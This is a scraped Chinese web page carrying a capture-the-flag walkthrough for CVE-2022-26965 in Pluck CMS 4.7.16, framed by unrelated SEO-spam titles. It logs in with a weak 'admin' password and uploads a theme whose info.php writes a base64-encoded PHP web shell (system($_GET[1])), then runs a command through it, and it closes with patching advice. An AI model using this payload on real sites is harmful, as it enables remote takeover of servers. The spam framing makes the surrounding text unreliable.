当前位置: 首页 > news >正文

网站域名注册机制个人建购物网站 备案

网站域名注册机制,个人建购物网站 备案,效果好的关键词如何优化,推广网站的作用简介 CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞。 攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行#xff0c;未经授权访问服务器#xff0c;造成潜在的安全隐患。 过程 1.打开环境#xff0c;查看源码#xff0c;发现login.php 2.进…简介 CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞。 攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行未经授权访问服务器造成潜在的安全隐患。 过程 1.打开环境查看源码发现login.php 2.进入查看登陆页面弱口令admin进行登录全英文界面可以翻译的哈 3.找到上传cms主题界面 4.去github下载相对应的版本主题随便下载一个就行 https://github.com/billcreswell/redline-theme 5.下载完成之后将文件里面的info.php里面的内容修改为下面的代码 ?phpfile_put_contents(testshell.php,base64_decode(PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg));? 解释使用file_put_contents函数将经过Base64解码后的字符串写入一个名为testshell.php的文件。 6.修改好的文件进行上传 文件上传成功。 7.连接 http://eci-2ze33y4rj8565dqp15iy.cloudeci1.ichunqiu.com/testshell.php?1cat%20/flag 成功。 解决方案 这个漏洞的解决方案是升级Pluck CMS到最新版本或打上已知的修补程序。 攻击者利用该漏洞一般会执行一些恶意代码包括上传一些特定的主题包然后执行一些远程命令从而获取服务器的控制权限因此升级或打上修补程序是解决该漏洞最直接有效的方法。 除此之外管理员还可以通过限制主题包的上传权限、对服务器进行安全扫描和加固等措施来提高系统的安全性。
http://wiki.neutronadmin.com/news/19332/

相关文章:

  • 免费的行情网站ifind是宠物网站开发背景
  • 企业网站建设费怎么记账dw网页制作考试题目
  • 企业网站建设专业精准丨 鸣远科技东莞网站建设哪里找
  • 无锡 网站 seo 优化网站开发人员晋升体系
  • 做十个网站制作网页原型的目的
  • 合肥做网站设计网站收录大全
  • 网站界面设计的发展网站建设银行转账
  • 天涯网站建设路小学wordpress爱搭配
  • 网站建设推广哪个好hxsp最新域名是什么
  • 做英文网站怎么赚钱谷歌云宝塔搭建WordPress
  • 网站建设按期没有完成能要回定金吗店面设计ppt
  • 寻花问柳专注做一家男人喜欢的网站google搜索首页
  • 电子商务网站建设需要多少钱舟山网站建设代理
  • 网站建设云梦一站式企业服务平台是什么
  • 西安做网站 送百度首页wordpress添加左侧菜单
  • 网站搭建费用外贸网站如何做推广多少钱
  • 公司网站设计怎么做网站建设的7种流程图
  • 深圳企业建站程序网站有什么优势
  • 网站查询空间商涉县网站设计
  • 网站开发安全性中国建设银行租赁网站
  • 防止网站扫描wordpress主题如何导入演示
  • 网站建设征集通讯员的通知制作招聘网页
  • 下载别人dede网站模版怎么让人理解网站建设
  • 购物网站服务器价格网络营销顾问是什么
  • 微网站建设的三个步骤专注于上海seo做网站建设
  • 做淘宝客网站性质做网站网站被抓没盈利
  • 网站建设加工wordpress美化主题
  • 电商网站开发研究内容和预期成果网站的seo方案
  • 齐河县城乡建设局官方网站wordpress换空间
  • 咨询型网站wordpress后台登陆地址修改